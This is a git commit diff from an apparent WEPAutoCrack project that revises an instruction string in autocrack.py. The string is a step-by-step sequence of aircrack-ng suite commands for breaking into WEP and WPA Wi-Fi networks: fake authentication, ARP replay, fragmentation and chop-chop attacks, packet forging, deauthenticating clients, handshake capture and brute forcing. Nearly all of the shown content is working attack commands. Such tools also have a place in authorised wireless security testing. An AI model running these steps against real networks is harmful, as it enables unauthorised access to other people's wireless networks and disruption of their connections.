diff options
author | Jason A. Donenfeld <Jason@zx2c4.com> | 2011-12-05 23:29:20 -0500 |
---|---|---|
committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2011-12-05 23:29:20 -0500 |
commit | c0a85caf1435636639efb98f3a63fd3e74e0ac5e (patch) | |
tree | 5e0791283697378b5ab0621e20aeb0a8a5914aec /autocrack.py | |
parent | Add WPA brute forcing. (diff) | |
download | WEPAutoCrack-c0a85caf1435636639efb98f3a63fd3e74e0ac5e.tar.xz WEPAutoCrack-c0a85caf1435636639efb98f3a63fd3e74e0ac5e.zip |
Improve instructions.
Diffstat (limited to 'autocrack.py')
-rwxr-xr-x | autocrack.py | 14 |
1 files changed, 8 insertions, 6 deletions
diff --git a/autocrack.py b/autocrack.py index 4ea9706..0c8c0f0 100755 --- a/autocrack.py +++ b/autocrack.py @@ -63,18 +63,23 @@ def pwn(interface, network): if network["Encryption"].startswith("WEP"): instructions = """ +=== Capture IVs == +airodump-ng -c CHANNEL --bssid BSSID -w output INTERFACE + == Get Deauthetication Packets (Fake Authentication) == aireplay-ng -1 0 -e 'NAME' -a BSSID -h MAC INTERFACE OR aireplay-ng -1 6000 -o 1 -q 10 -e 'NAME' -a BSSID -h MAC INTERFACE +* the latter is good for persnikitty stations == Request ARP Packets == aireplay-ng -3 -b BSSID -h MAC INTERFACE -* if successful move to capture IVs +* if successful, skip the next three steps and move to analyze == Fragmentation Attack (if requesting ARPs didn't work - no users on network) == aireplay-ng -5 -b BSSID -h MAC INTERFACE * use this packet? yes +* if successful, skip the next step and construct an arp packet == Chop-Chop Attach (if fragmentation fails) == aireplay-ng -4 -b BSSID -h MAC INTERFACE @@ -84,10 +89,7 @@ aireplay-ng -4 -b BSSID -h MAC INTERFACE packetforge-ng -0 -a BSSID -h MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-request * k source, l destination - change for persnikittiness -== Capture IVs == -airodump-ng -c CHANNEL --bssid BSSID -w output INTERFACE - -== Inject Constructed ARP (if fragmentation or chop-chop) == += Inject Constructed ARP (if fragmentation or chop-chop) == aireplay-ng -2 -r arp-request INTERFACE * use this packet? yes @@ -99,7 +101,7 @@ aircrack-ng -z -b BSSID output*.cap == Collect 4-way Authentication Handshake == airodump-ng -c CHANNEL --bssid BSSID -w psk INTERFACE -== Deauthenticate Wireless Client (optional) == +== Deauthenticate Wireless Client == aireplay-ng -0 1 -a BSSID -c CLIENT wlan0 == Brute Force == |